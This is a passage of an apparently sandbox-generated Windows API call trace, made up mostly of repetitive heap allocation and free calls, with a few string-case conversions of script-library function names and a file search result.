nFileSizeLow=0xf43e, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="5N nlGCuCJHLr.gif", cAlternateFileName="5NNLGC~1.GIF")) returned 0x41ac000 [0129.647] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0129.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0129.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0129.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0129.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0129.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0129.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0129.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925e0 [0129.647] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0129.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925e0 | out: hHeap=0x1780000) returned 1 [0129.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0129.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0129.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0129.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0129.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0129.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0129.648] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0129.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0129.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391fc0 [0129.649] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0129.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391fc0 | out: hHeap=0x1780000) returned 1 [0129.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0129.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0129.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0129.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0129.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0129.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0129.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0129.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0129.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0129.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0129.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391fc0 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0129.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0129.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0129.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0129.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.652] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0129.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0129.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0129.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0129.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0129.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0129.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0129.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0129.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0129.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0129.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0129.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0129.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0129.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0129.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0129.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0129.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0129.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0129.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.705] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.708] HeapFree (in: 